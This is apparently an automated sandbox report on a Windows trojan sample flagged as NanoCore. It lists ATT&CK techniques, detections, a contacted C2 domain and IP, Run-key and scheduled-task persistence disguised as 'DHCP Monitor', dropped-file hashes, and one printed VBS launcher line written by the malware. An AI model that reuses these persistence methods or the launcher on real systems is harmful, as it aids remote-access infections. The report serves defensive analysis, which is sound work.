        Default Accounts | Native API 1 | Valid Accounts 2 | DLL Side-Loading 1 | Deobfuscate/Decode Files or Information 11 | LSASS Memory | Account Discovery 1 | Remote Desktop Protocol | Input Capture 31 | Exfiltration Over Bluetooth | Encrypted Channel 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
        Domain Accounts | Command and Scripting Interpreter 2 | Scheduled Task/Job 1 | Valid Accounts 2 | Scripting 11 | Security Account Manager | File and Directory Discovery 2 | SMB/Windows Admin Shares | Clipboard Data 2 | Automated Exfiltration | Non-Standard Port 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
        Local Accounts | Scheduled Task/Job 1 | Logon Script (Mac) | Access Token Manipulation 21 | Obfuscated Files or Information 2 | NTDS | System Information Discovery 36 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Remote Access Software 1 | SIM Card Swap | | Carrier Billing Fraud
        Cloud Accounts | Cron | Network Logon Script | Process Injection 312 | Software Packing 12 | LSA Secrets | Security Software Discovery 121 | SSH | Keylogging | Data Transfer Size Limits | Non-Application Layer Protocol 1 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
        Replication Through Removable Media | Launchd | Rc.common | Scheduled Task/Job 1 | DLL Side-Loading 1 | Cached Domain Credentials | Virtualization/Sandbox Evasion 21 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Application Layer Protocol 11 | Jamming or Denial of Service | | Abuse Accessibility Features
        External Remote Services | Scheduled Task | Startup Items | Startup Items | Masquerading 12 | DCSync | Process Discovery 2 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
        Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Valid Accounts 2 | Proc Filesystem | Application Window Discovery 11 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
        Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Virtualization/Sandbox Evasion 21 | /etc/passwd and /etc/shadow | System Owner/User Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
        Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Access Token Manipulation 21 | Network Sniffing | Remote System Discovery 1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact
        Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Process Injection 312 | Input Capture | Permission Groups Discovery | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | | | Service Stop
        Compromise Software Supply Chain | Unix Shell | Launchd | Launchd | Hidden Files and Directories 1 | Keylogging | Local Groups | Component Object Model and Distributed COM | Screen Capture | Exfiltration over USB | DNS | | | Inhibit System Recovery

        Behavior Graph

        [Behavior graph image not preserved. Behavior Graph ID: 500960, Sample: dAkJsQr7A9.exe, Startdate: 12/10/2021, Architecture: WINDOWS, Score: 100]

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        Source | Detection | Scanner | Label | Link
        dAkJsQr7A9.exe | 59% | ReversingLabs | Win32.Trojan.Sabsik |
        dAkJsQr7A9.exe | 100% | Joe Sandbox ML | |

        Dropped Files

        Source | Detection | Scanner | Label | Link
        C:\Users\user\31956653\xmjk.pif | 100% | Joe Sandbox ML | |
        C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | 0% | Metadefender | | Browse
        C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | 0% | ReversingLabs | |
        C:\Users\user\31956653\xmjk.pif | 37% | Metadefender | | Browse
        C:\Users\user\31956653\xmjk.pif | 56% | ReversingLabs | Win32.Packed.Generic |
        C:\Users\user\AppData\Local\Temp\RegSvcs.exe | 0% | Metadefender | | Browse
        C:\Users\user\AppData\Local\Temp\RegSvcs.exe | 0% | ReversingLabs | |

        Unpacked PE Files

        Source | Detection | Scanner | Label | Link | Download
        6.2.RegSvcs.exe.b00000.1.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7 | | Download File
        6.2.RegSvcs.exe.60b0000.11.unpack | 100% | Avira | TR/NanoCore.fadte | | Download File
        25.2.RegSvcs.exe.bc0000.1.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7 | | Download File

        Domains

        No Antivirus matches

        URLs

        Source | Detection | Scanner | Label | Link
        http://www.onnodb.com/aetraymenuH( | 0% | Avira URL Cloud | safe |

        Domains and IPs

        Contacted Domains

        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        windowsupdate.s.llnwi.net | 178.79.242.0 | true | false | | high
        strongodss.ddns.net | 185.19.85.175 | true | false | | high

            URLs from Memory and Binaries

            Name | Source | Malicious | Antivirus Detection | Reputation
            http://www.onnodb.com/aetraymenuH( | xmjk.pif, 00000004.00000000.332849092.000000000049B000.00000002.00020000.sdmp, xmjk.pif, 0000000D.00000000.366495909.000000000049B000.00000002.00020000.sdmp, xmjk.pif, 00000014.00000000.372500694.000000000049B000.00000002.00020000.sdmp, xmjk.pif, 00000016.00000000.390620091.000000000049B000.00000002.00020000.sdmp, xmjk.pif, 0000001B.00000002.427944627.000000000049B000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | unknown
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | RegSvcs.exe, 00000006.00000002.576672734.0000000002EE1000.00000004.00000001.sdmp | false | | high

              Contacted IPs

              Public

              IP | Domain | Country | Flag | ASN | ASN Name | Malicious
              185.19.85.175 | strongodss.ddns.net | Switzerland | | 48971 | DATAWIRE-ASCH | false

              General Information

              Joe Sandbox Version:33.0.0 White Diamond
              Analysis ID:500960
              Start date:12.10.2021
              Start time:12:33:05
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 15m 29s
              Hypervisor based Inspection enabled:false
              Report type:full
              Sample file name:dAkJsQr7A9.exe
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:45
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal100.troj.evad.winEXE@27/41@10/1
              EGA Information:Failed
              HDC Information:
              • Successful, ratio: 12% (good quality ratio 11.4%)
              • Quality average: 74.5%
              • Quality standard deviation: 27.9%
              HCA Information:Failed
              Cookbook Comments:
              • Adjust boot time
              • Enable AMSI
              • Found application associated with file extension: .exe
              Warnings:
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, audiodg.exe, BackgroundTransferHost.exe, consent.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
              • Excluded IPs from analysis (whitelisted): 23.203.141.148, 20.50.102.62, 93.184.221.240, 20.199.120.151, 20.199.120.182, 20.82.210.154, 2.20.178.24, 2.20.178.33, 20.54.110.249, 52.251.79.25, 40.112.88.60, 95.100.216.89
              • Excluded domains from analysis (whitelisted): consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, wu.azureedge.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
              • Not all processes were analyzed, report is missing behavior information
              • Report creation exceeded maximum time and may have missing behavior and disassembly information.
              • Report creation exceeded maximum time and may have missing disassembly code information.
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size exceeded maximum capacity and may have missing disassembly code.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Report size getting too big, too many NtSetInformationFile calls found.
              • VT rate limit hit for: /opt/package/joesandbox/database/analysis/500960/sample/dAkJsQr7A9.exe

              Simulations

              Behavior and APIs

              Time | Type | Description
              12:34:30 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Chrome C:\Users\user\31956653\xmjk.pif C:\Users\user\31956653\thjfdg.xcp
              12:34:37 | Task Scheduler | Run new task: DHCP Monitor path: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe" s>$(Arg0)
              12:34:37 | API Interceptor | 803x Sleep call for process: RegSvcs.exe modified
              12:34:38 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate C:\Users\user\31956653\Update.vbs
              12:34:39 | Task Scheduler | Run new task: DHCP Monitor Task path: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" s>$(Arg0)
              12:34:48 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe

              Joe Sandbox View / Context

              IPs

              No context

              Domains

              No context

              ASN

              No context

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
              Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):45152
              Entropy (8bit):6.149629800481177
              Encrypted:false
              SSDEEP:768:bBbSoy+SdIBf0k2dsYyV6Iq87PiU9FViaLmf:EoOIBf0ddsYy8LUjVBC
              MD5:2867A3817C9245F7CF518524DFD18F28
              SHA1:D7BA2A111CEDD5BF523224B3F1CFE58EEC7C2FDC
              SHA-256:43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
              SHA-512:7D3D3DBB42B7966644D716AA9CBC75327B2ACB02E43C61F1DAD4AFE5521F9FE248B33347DFE15B637FB33EB97CDB322BCAEAE08BAE3F2FD863A9AD9B3A4D6B42
              Malicious:false
              Antivirus:
              • Antivirus: Metadefender, Detection: 0%, Browse
              • Antivirus: ReversingLabs, Detection: 0%
              Reputation:unknown
              C:\Users\user\31956653\Update.vbs
              Process:C:\Users\user\31956653\xmjk.pif
              File Type:ASCII text, with no line terminators
              Category:modified
              Size (bytes):0
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:FER/n0eFH5OWXp5TcQfSOL0eWXp5TcQfRfH:FER/lFHIWXpDWeWXpD5fH
              MD5:2C760FEAA61BDB817B1A1E47DB415464
              SHA1:4D4A10381CF79693E07DC12F6D3D2E817FE0F8E6
              SHA-256:DEF99AF20BF09CBDCADBD5265CE8030CDE157CB717EE366B0D13CE979DAF87B9
              SHA-512:011F977A63C157775FF4114E6FC512DBDE71338F1C6F77CCEDCF916A5AFF0E0F4E1A861EE45C0C96E8FBFD01FA90805ADAD1AEC5A2DBB4E1D71F23F2AB16F409
              Malicious:false
              Reputation:unknown
              Preview: CreateObject("WScript.Shell").Run "C:\Users\user\31956653\xmjk.pif C:\Users\user\31956653\thjfdg.xcp"
              C:\Users\user\31956653\ailgkjbn.log
              Process:C:\Users\user\Desktop\dAkJsQr7A9.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):566
              Entropy (8bit):5.474806202875037
              Encrypted:false
              SSDEEP:12:6RsfOzSb2eBfwqcTHw3I3QK5/ph6hoAen4PWh:1ZdqT/3Qe/Nniq
              MD5:28E06D43C4A87B30ACF1E733562A4803
              SHA1:974D8AE0C0E74D013FADE83771E8115AF06E743C
              SHA-256:F2AD07A7279070982BF482DEAFF192A830CB9BB30D107D068BAD4DB614B480A4
              SHA-512:EA06C6FA427D35E946DA94DB02D5465212DB2D9C28C1A233D435681561F57695CA95E849416A85A0993D7ED8C50FE4E1E3F43D24F6D79F273BA6DAEA8A00F713
              Malicious:false
              Reputation:unknown
              C:\Users\user\31956653\bwhgjbnh.log
              Process:C:\Users\user\Desktop\dAkJsQr7A9.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):618
              Entropy (8bit):5.492211285373292
              Encrypted:false
              SSDEEP:12:g5mQnoBIIzM4IsfkXZlqgjwooNtMR5i1ISn1URtd42B66F2a:HQoBDhMPvjwokiR5i1IQeRD42B6a/
              MD5:AB4AB7821096064493E76399254C86E9
              SHA1:BFCD02463B2461C33E42D20893E25E3C11FE793F
              SHA-256:20349787AC0F07ED5749CF5676CEE6D4977B714A4716BB1B3398C04DDE439B9A
              SHA-512:C83E64D7262E7CE7494CF9EBD89D6F04162B59C39ABCC337E365E3C7BAFE6135610BA83B8084F79159A2D107657697B366F1A286F77B9583EC5742F47D1B2E81
              Malicious:false
              Reputation:unknown
              C:\Users\user\31956653\cmeaaw.icm
              Process:C:\Users\user\Desktop\dAkJsQr7A9.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):502
              Entropy (8bit):5.518570874996825
              Encrypted:false
              SSDEEP:12:GORcQkX9ftOfhDkKVXWyw7R4GRg4UgUp5yiejVm:GO6QkX9f8vhWy4RKTDFejs
              MD5:3499E273898AD561A098D9FA4EBF4F99
              SHA1:94908C6032CA83B4D9C8155B90F476A8CE217F9B
              SHA-256:16612DA64414084D50A38DDB0B48ED8B805914655FF0AD67775999E5052FDBF9
              SHA-512:FE676D37932C7E12751CEC9D7A580FD9A78D94CDBD7337F3F5D397E1549E7001D9F86EC2C0C2437CF63BAC2DE81CE23C3EB5B8E9FCD4EB93F4121A00419F5A91
              Malicious:false
              Reputation:unknown
              C:\Users\user\31956653\eblsq.ppt
              Process:C:\Users\user\Desktop\dAkJsQr7A9.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):49345
              Entropy (8bit):5.587895640570609
              Encrypted:false
              SSDEEP:1536:OZ7+4wnkTPomimumHx/io+9h8ALSQX4StbCyh3ZwRF+Kfslj:SykTgEumHxx+9+cSQo3yhGP90lj
              MD5:E9F03E752D086599C5F285B4CEFE1F52
              SHA1:538098DEA70D96CFD1A070A8D8EB824D7CC80DF6
              SHA-256:D65205429A1F0FD8FD3DA688F1C703944F41128D543801CFF8E5E7EF3B11448E
              SHA-512:0474865940482F84D25C94B3F6DDCA33DCE370932E03E06F45C46AF25BCFC12770B8FAF6C116D637C780E04D9A897084A52FDBECDBAF78D6C3A7C2C9162C3A22
              Malicious:false
              Reputation:unknown
              C:\Users\user\31956653\ecbgd.exe
              Process:C:\Users\user\Desktop\dAkJsQr7A9.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):502
              Entropy (8bit):5.492718450958176
              Encrypted:false
              SSDEEP:12:aGRVZUPx1L2S07WsolsYAEnvQzcxyeDYmt2GkDWDhla4L:1VI1LNGW19vQzcxyKYmsfWdlaK
              MD5:28D423CEA277EC2F8B385968A741F27E
              SHA1:8FEE5ADF02336520DE0E71FFA55FBB80078B7048
              SHA-256:37C0981080756F4E532ABCF3C64B87F27C62B2C0111C567E2183652DCD7852AD
              SHA-512:0D8BF1DDE5C9184F98AAC8429D819ACBE014FBF42BD7D4B1F70B8E10CBF26AF843D2E88E78713AD324540FF7993838CD07FDA262FA60A6243C071013F9E82B0D
              Malicious:false
              Reputation:unknown
              C:\Users\user\31956653\emngwc.ico
              Process:C:\Users\user\Desktop\dAkJsQr7A9.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):586
              Entropy (8bit):5.5426308661865695
              Encrypted:false
              SSDEEP:12:cQjeQ63r6OHW2hE8CPOVCaIGVBdVXe2xlPSCkxODf7T90Nsm+Un:cWP6362htmGCZGv/734Ob7pOH+U
              MD5:6CD6F7DB6C60AF4E1E524759D71E579B
              SHA1:A590D0F3C84ABDDACCA95C3842D5BAAA28C38844
              SHA-256:88F39B3996B987B2EE399EF315E02757A357205EC1CD34646ADC8B6E940A9B6A
              SHA-512:6091C410E324EEF9F02079CE2AE8EA904E74C824FB8BDE65B63DC4F1F56D5E67C491DDFCAA7BC0C422AC5253A49BD909F10AD4BD8D9B655390D4CCAF9DF7C4FF
              Malicious:false
              Reputation:unknown
              C:\Users\user\31956653\eoltp.msc
              Process:C:\Users\user\Desktop\dAkJsQr7A9.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):528
              Entropy (8bit):5.493405913038473
              Encrypted:false
              SSDEEP:12:RiGRHEwjRks6woDA8CmOhFQWAv7+++B537Vt4w0QZ6V6o4:Mxyks6FkRm6qPza7H4wV+6J
              MD5:A307ED59D7093C9D83D305E38E48BB7F
              SHA1:82DEE4639CD41DA817E1434C276B700F84310592
              SHA-256:B31F2D309D1FCF67725328892919420F08F51C7ED41A8A7CC238075DED84E5AA
              SHA-512:57E8AE3E60B843864909222F45865829F44825A257152B4BE1D0DC2EAD73F6047855234BB4E373D868EFB0494F7BE133A651FAD0648D4E3B1F4215196F54FD7D
              Malicious:false
              Reputation:unknown
              C:\Users\user\31956653\jdmhhwxx.dll
              Process:C:\Users\user\Desktop\dAkJsQr7A9.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):518
              Entropy (8bit):5.489925874272235
              Encrypted:false
              SSDEEP:6:2FRNmMwFTAZcnnG5ahpG7AGwtWF1Ccyh+14qMzT49wpT0SAvDNpYHJ3N9HNSXpxH:ybmRAiLhxtMA+WzTrhwgJ3NmXpA1V91q
              MD5:1917FEE95C8AF5BC4CBA1345D67F8A18
              SHA1:7DD6E4E5B44B032C93B0911DB1328A70EAC80DD7
              SHA-256:AB0091F4F773536CA9D51BECA3E5AD58ABF2180AD06DD646C7845D1FE53C9A11
              SHA-512:7D44BA47292F6F7DD84F9D8F74F2C44FB7CF09628E511E2A18053C9B77AECFE85BB6FD16AAB1300440199876A3F5D093D2AECFD3E3235B26D822F6D195039D0B
              Malicious:false
              Reputation:unknown
              C:\Users\user\31956653\jhuu.xvs
              Process:C:\Users\user\Desktop\dAkJsQr7A9.exe
              File Type:ASCII text, with very long lines, with no line terminators
              Category:dropped
              Size (bytes):430098
              Entropy (8bit):4.000009436079219
              Encrypted:false
              SSDEEP:6144:y/vX4WkRrUZQvMXfnVxAmsVlcUP5sNqiUD5sGZRtSH9:y/rXfVxAms7P5sNqHxRts9
              MD5:9990C4B0B0D9FD51DEBD402EB04FDC42
              SHA1:8C1CF56BC1F2A715B4333F6BE0DAF0BD9E61232D
              SHA-256:08232B8E0E07D352C6528E64F6CDB7EC7D52B1066186C64B24E991F731F55FD1
              SHA-512:B9C7C3678A05D5C30609FC2E4663D34AD3486D4FF587A517B4BBEC8E6B09DAB47B93F1C2EE3117E7F15F8FFEB4BD6EBA08EAACA89576633D65F1ED709710854A
              Malicious:false
              Reputation:unknown
              C:\Users\user\31956653\lsrlf.xl
              Process:C:\Users\user\Desktop\dAkJsQr7A9.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):610
              Entropy (8bit):5.534043765719752
              Encrypted:false
              SSDEEP:12:oBXsRS13pvqiTWBRRYVLAfTNuGIEwkLSXQ2rIQfwvVWQMZ+xkWE43+87tzSH:edpyIWzNbNuGIAL+f4vg8aWE4u87tzSH
              MD5:7F921B7F69F739F05907104392B9B518
              SHA1:BF6F23AD7E768EA57B1E686C80C296258E8EE4E0
              SHA-256:3D631AF450E4C57D40CDBA273F2670B1CAC8C92201423FC022303922672D445E
              SHA-512:D723F53A420E95EF46835022FB6C82359BCCE6E54E9505434CB7D9ACC4A02DA30DCB6067E4F9546273143D18611085D3B0EC931F742C57FC78F9A077B05366E2
              Malicious:false
              Reputation:unknown
              C:\Users\user\31956653\nfnfdq.bmp
              Process:C:\Users\user\Desktop\dAkJsQr7A9.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):571
              Entropy (8bit):5.4258865359256285
              Encrypted:false
              SSDEEP:12:WA5I86YrEEaJiAiFxRr8bGAtidb8Wd4DqBxZxSKVsFxF6RkO7s4:WSI8phaJiAGWwbY8kO7s4
              MD5:4D5D0D4C703103475DAE81F0621B8115
              SHA1:38DFAE875765BBEBD7047ED770B8346EB9A18D12
              SHA-256:4B8F7FCA38E042BE1CAA4289B8CEB85579274EB8989BA5F1E63DE9315C8DDAEC
              SHA-512:982DACDFBA4C9C316860B04DD9C53D109083ACAE63CBBF4B4B20E0F6B8BBCA3551B39DA1D0855DE6DDCA895CCAC19209EFBDA31E9C9A0E381E0E7E672C15C20B
              Malicious:false
              Reputation:unknown
              C:\Users\user\31956653\pgbpe.xl
              Process:C:\Users\user\Desktop\dAkJsQr7A9.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):551
              Entropy (8bit):5.521649808206063
              Encrypted:false
              SSDEEP:12:wHB8ipEd9NyrqH623PyBP5H9T4k1T7EfW2bNXOw:qaipEdarayh5H90k1vEfW2bFd
              MD5:59CF11E97D4E3DBB74BAA742880DC604
              SHA1:6F488C6018EA5C6EC1F1D13C1F4590DBD71C3ECA
              SHA-256:C2C2CC14FC87666E687F1AD205A3BB967CE97BAA15FD897E1B9B2BFCBD7C3F79
              SHA-512:3BC00980B36308785A63DCF809DE2AF16AC48C2FAE5C6CF3AA170F3AE896BFEC140E704D46080BA40A3739EAA0C23BE96B684451CA912EC6852657851886DFAF
              Malicious:false
              Reputation:unknown
              C:\Users\user\31956653\qixdqtxae.log
              Process:C:\Users\user\Desktop\dAkJsQr7A9.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):526
              Entropy (8bit):5.480927918891487
              Encrypted:false
              SSDEEP:12:LQFtsoKyX/+Y3+oddh2qZthuzwAouctvX7vB2RcEMk:Lqtl7GrQd/hgwlbPS1Mk
              MD5:1867000A68FB9CA6F42E190806A8EFE6
              SHA1:48D57FD28D9E440D165A4D7FF96C362E5899530C
              SHA-256:B1B7796D138B12A9E3CFC5BAEAA8A136E7B09F1EE46321686E21EC917F9A0C4F
              SHA-512:6213222C7633201EAD0A966811AA7C6645082880B5EDB0D1D618EC10D7544319C64A1DD2186B5B45BD5CFA5498B702DF13BD52C3EC26EA574C01B669068EC1F3
              Malicious:false
              Reputation:unknown
              C:\Users\user\31956653\qsfuelnwxb.jpg
              Process:C:\Users\user\Desktop\dAkJsQr7A9.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):603
              Entropy (8bit):5.461083340782776
              Encrypted:false
              SSDEEP:12:Y+cdtO/mSL6Vs86dZ6vySV9y5CaQloNHXj5KDoI7BW7p:idt/N6/hmCCaQlSdKDomUp
              MD5:0A5C2FC9ECB89593B6B68AC91D90649E
              SHA1:7EE3267AA965D17A80B4B20B68454C4077FD5AFF
              SHA-256:55B1A7C4E9FE5B08C145BAEA8FA172CE4BF3EC86A4EDA385E73A72B02E497D47
              SHA-512:6144231D8306BEF01C2BA6D647D44CF7185B4231DF34A24105B6A189FBF0ABC0F3BA7492AC2F2DDDC5381670A13BDB05B0C8B7A1557804492D9000210D7CE829
              Malicious:false
              Reputation:unknown
              C:\Users\user\31956653\rnudekk.ico
              Process:C:\Users\user\Desktop\dAkJsQr7A9.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):524
              Entropy (8bit):5.486830582958616
              Encrypted:false
              SSDEEP:12:X+DA3rd8COUO+zUHzqFiKj5nGlVmTfvG0cbIx3R7OFJRBx1BVGoGjep:u03ZZ7O+zUOFh9ngVmTXG0cbIdRqbp1T
              MD5:6E04A18D33AA0C86F8B718DFC6B2077F
              SHA1:1794F45151C61ACB13E54D0F84C9815FF9572E1A
              SHA-256:605DCE07B7E1986CECE7451A82684F1558617D896CE4727DD7DC0DD7774935F3
              SHA-512:A9376B51B80C576000F25C8189F46021E8350A182E58D8C6CAD972937C059D31516E8D59138C318219A3F5BD9E5F1223F2DD0B9F1340DEBD65AEB22A9F6D8381
              Malicious:false
              Reputation:unknown
              C:\Users\user\31956653\rpxeq.txt
              Process:C:\Users\user\Desktop\dAkJsQr7A9.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):520
              Entropy (8bit):5.481999414152157
              Encrypted:false
              SSDEEP:12:SjnPOsSS2ahe8kdz3kvGKxskGQlt0j64/keiXGWRyq8pefUIN2Yy:Sjnmsh2qe8CjkPskGQltQH/fiXGWRyqY
              MD5:A900C8F319EEF4A0E676999F344C5D4F
              SHA1:9AA841963FF4B3DC10F8744AD184BDA11AD52B10
              SHA-256:8234EC2FD54B7979672FBB55E012C97E9B53E26D7CC641995C903CBEEEE0F07F
              SHA-512:C5D314CEA5C138C3214FC13E73E0FA194CACA8E2EA3C0F780D190B7219242D3780CD3D9E4E290EA68333317C013F3F1DA92B398EA582F9F69BF348E094ECB95E
              Malicious:false
              Reputation:unknown
              C:\Users\user\31956653\srveorm.cpl
              Process:C:\Users\user\Desktop\dAkJsQr7A9.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):529
              Entropy (8bit):5.443698259483672
              Encrypted:false
              SSDEEP:12:TGS1W5yztPSxuyOqhx35J0ZOPAhQ/TPaEHGKWfHz87:iwPkPX35JcYTCEjWfHzM
              MD5:2561FBA5E942F77FCCC08BB6ED4D7951
              SHA1:9EF612A45DCC959BED9B4C1A065D96BF92FB0255
              SHA-256:6E06F3178B983D6AEA07C03A01AE8433296D6A6D1C8FE0BCA1FF881C5A5EADC4
              SHA-512:8EE80F7D9F2BD4B4ED0AE29789D6BB5A7F4BA85A0699353A735FE46024CC99DFF9F8BE3D3CEBB8B4DCD41C1D94AF46967D65AF870799CFC11BDDA62E22130088
              Malicious:false
              Reputation:unknown
              C:\Users\user\31956653\tahpojnovs.ppt
              Process:C:\Users\user\Desktop\dAkJsQr7A9.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):517
              Entropy (8bit):5.4730474782292795
              Encrypted:false
              SSDEEP:12:mZUdKYYOy2QpQ2KPgd7v4c6fcJ5WFBJfdyhdAm:mGZQC2eiB64gt9m
              MD5:70E2BD4A5F6CC048F2037FB6DBF60F59
              SHA1:8957E9BEE99D6659F3E90744478B2DF01C2AFF7E
              SHA-256:8E348CAD128DBD38F4DB072FAB87E66373848747408D99F35C10C36E325B8B0A
              SHA-512:07BBA7B2A91C65D3AF8B7229AE82BF7481E50EDD8B3D0D8C550113B8CA28E108E6E9B12461C9F8617DECC6C66AF3ACBBE8145DD3A84F24B95799CAFDE1EB1C85
              Malicious:false
              Reputation:unknown
              C:\Users\user\31956653\thjfdg.xcp
              Process:C:\Users\user\Desktop\dAkJsQr7A9.exe
              File Type:data
              Category:dropped
              Size (bytes):179166850
              Entropy (8bit):7.0277013788137745
              Encrypted:false
              SSDEEP:196608:epjpnpfpspOpIprp7pYpDpbppp4p4pmpEpgpnpmpCppp1pMpkptpxpWpbpKpzp4+:n
              MD5:464F02264814F67FF065A76FB3BB221E
              SHA1:B98087AF04678AACC6F98F9400F07517A8064097
              SHA-256:E853C69EC2723E99937524F06EA79ED700A9491174222605E951839F023DAE40
              SHA-512:89700BAC8A52B40EB3A8E0109D054B6C3E043B54B5AB9CD0048AA162C277906DDD0BEE61AB6A262CA12AA55F86D9585A271867F138A21E6A79558F3278F6BAC6
              Malicious:false
              Reputation:unknown
              C:\Users\user\31956653\tlogpwsu.xml
              Process:C:\Users\user\Desktop\dAkJsQr7A9.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):506
              Entropy (8bit):5.465090732929896
              Encrypted:false
              SSDEEP:
              MD5:7ECA9413CD44177EA404E1F3549D303B
              SHA1:08AB492A0D375AC8DEBDA33A750E9703B2FAC1A5
              SHA-256:434D3D0A388D45DFD31F620784FE8224A75088A3F5130B78966196F5854CCF81
              SHA-512:013CFD2B36669F55A268C146742E3CFE3F430315F44F848EB78D071B4ECA36A0B99A56FDD5AAB116D48E65DE770C5AC5BF95CC2F39792E8669541FD82D618BE4
              Malicious:false
              Reputation:unknown
              C:\Users\user\31956653\ufrxn.msc
              Process:C:\Users\user\Desktop\dAkJsQr7A9.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):531
              Entropy (8bit):5.502780045827598
              Encrypted:false
              SSDEEP:
              MD5:6074D095111C359480ACB96C9231F66F
              SHA1:088A5DA089F1BD720B0F8E92A2D7A68F0488AE56
